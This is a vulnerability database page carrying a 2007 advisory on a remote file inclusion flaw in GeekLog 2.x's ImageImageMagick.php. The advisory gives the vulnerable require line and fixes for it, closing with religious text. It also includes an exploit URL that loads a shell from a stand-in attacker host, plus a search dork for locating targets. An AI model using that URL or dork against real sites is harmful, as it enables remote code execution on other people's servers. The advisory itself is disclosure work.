Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

geeklog2-rfi.txt

🗓️ 21 May 2007 00:00:00Reported by diesl0wType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 60 Views

GeekLog 2.* RFI Vuln found in ImageImageMagick.php requiring security measure

Show more
Code
`--------------------------------[ 05/18/2007 ]---------------------------------  
  
GeekLog 2.* (ImageImageMagick.php) RFI Vuln  
  
-----------------------------------[ ASCII ]-----------------------------------  
  
## ### # ###   
## # ### / /###   
## ### ## / / ###   
## # ## / ## ### ##   
## ## / ## #### ##   
### ## ### /## /### ## ## ## ## ## ### ####   
######### ### / ### / #### / ## ## ## ## ## ### ### /   
## #### ## / ### ## ###/ ## ## ## ## ## ### ###/   
## ## ## ## ### #### ## ## ## ## ## ## ##   
## ## ## ######## ### ## ## ## ## ## ## ##   
## ## ## ####### ### ## ## ## ## ## ## ##   
## ## ## ## ### ## ## # / ## ## ##   
## /# ## #### / /### ## ## ### / ## /# /   
####/ ### / ######/ / #### / ### / ######/ ######/ ######/   
### ##/ ##### ###/ ##/ ### ##### #####   
-dsd863 [at] yahoo.com-   
---------------------------------[ Contacts ]---------------------------------  
  
diesl0w @ UnderNET  
#hackphreak #oldskewl #ubergeeks #linux.edu #linuxhq  
  
----------------------------------[ Credit ]----------------------------------  
  
rgod <rgod [at] autistici.org> for his original BaseView.php RFI find  
  
---------------------------------[ Download ]---------------------------------  
  
http://www.geeklog.net/nightly/geeklog2-cvs-nightly.tar.gz  
  
---------------------------------[ Vuln Code ]--------------------------------  
  
[geeklog path]/system/ImageImageMagick.php?glConf[path_system]=http://www.badsite.com/shell.txt?  
  
  
-----------------------------------[ Issue ]----------------------------------  
  
-Line 3 of ImageImageMagick.php-  
  
require $glConf['path_system'] . 'BaseImage.php';  
  
-----------------------------------[ Google ]----------------------------------  
  
"Powered By Geeklog"  
  
----------------------------------[ Solution ]---------------------------------  
Change php.ini and set allow_url_fopen to Off  
(Not tested but disabling URL-Access will fix the issue)  
  
or  
  
Insert the following code before line 3:  
  
Add the following code:  
  
if (strpos ($_SERVER['PHP_SELF'], 'ImageImageMagick.php') !== false){ die('Cant access file by itself.'); }  
  
----------------------------[ Word from my sponsor ]---------------------------  
  
Non-Christians: We were born sinners in need of a fix. Without Jesus as a we are going to hell. point blank  
Christians: Keep passing the faith. Crucify yourself daily. When you fall, get back up.  
  
Romans 3:23  
"for all have sinned and fall short of the glory of God"  
  
Romans 6:23  
"For the wages of sin is death, but the gift of God is eternal life through Jesus Christ our Lord."  
  
Romans 10:9  
"That if you confess with your mouth, "Jesus is Lord," and believe in your heart that God raised him from the dead, you will be saved."  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
21 May 2007 00:00Current
7.4High risk
Vulners AI Score7.4
geeklogrfiimageimagemagickvulnphp.iniallow_url_fopenbaseimage.phpsecurity measuresurl-access
60
.json
Report